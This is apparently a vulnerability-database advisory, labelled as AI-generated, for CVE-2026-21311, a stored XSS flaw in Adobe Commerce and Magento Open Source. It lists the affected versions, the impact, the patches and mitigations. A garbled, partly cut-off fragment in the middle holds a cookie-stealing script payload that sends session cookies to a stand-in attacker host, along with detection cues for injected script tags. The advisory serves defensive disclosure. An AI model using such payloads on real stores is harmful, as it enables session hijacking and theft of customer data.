
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21311 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a high-privileged attacker to inject malicious scripts into vulnerable form fields. Affected versions include Adobe Commerce 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier, as well as corresponding Magento Open Source and Commerce B2B versions. The vulnerability was disclosed on March 10–11, 2026, with Adobe releasing a security update as part of APSB26-05. It carries a CVSS v3.1 base score of 8.0 (High) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A high-privileged attacker can inject malicious JavaScript payloads into vulnerable form fields within the Adobe Commerce admin interface; these scripts are stored server-side and subsequently executed in the browser of any victim who navigates to the page containing the compromised field. Exploitation requires user interaction — a victim must browse to the affected page — and the attack vector is network-based with high attack complexity. The scope is changed, meaning the injected script executes in the context of the victim's browser session rather than the attacker's (Adobe Advisory).
Successful exploitation can result in session takeover, enabling an attacker to hijack authenticated user sessions and perform unauthorized actions on behalf of the victim. Both confidentiality and integrity impacts are rated High, as the attacker can exfiltrate session tokens, credentials, or sensitive commerce data, and can modify page content or user data. Availability is not directly impacted. Given Adobe Commerce's role in e-commerce operations, session hijacking could expose customer payment data, order information, and administrative credentials (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>) into the vulnerable form field and save the record.<script> tags or JavaScript event handlers (e.g., onerror, onload) in database fields for CMS blocks, product attributes, or category descriptions.Adobe has released patches addressing this vulnerability as part of security bulletin APSB26-05. Organizations should upgrade to the following fixed versions: Adobe Commerce 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, or 2.4.4-p17 (or later), and apply corresponding Commerce B2B module updates. As interim mitigations, restrict admin panel access to trusted IP addresses, enforce strong authentication (MFA) for all privileged accounts, and implement a strict Content Security Policy (CSP) to limit script execution to trusted origins. Regularly audit admin user accounts and review CMS/product content for unexpected script injections (Adobe Advisory).
The vulnerability was covered as part of Adobe's broader March 2026 patch release, which addressed approximately 80 vulnerabilities across eight products. Security news outlets including CyberHub Podcast and BeyondMachines noted the scale of Adobe's March 2026 patching effort. The CIS published an advisory noting that multiple Adobe product vulnerabilities could allow for arbitrary code execution in the broader patch batch. Community reaction on platforms such as Bluesky and Mastodon was largely informational, with security aggregators flagging the CVE shortly after disclosure. No significant researcher-specific commentary or controversy was noted for this individual CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."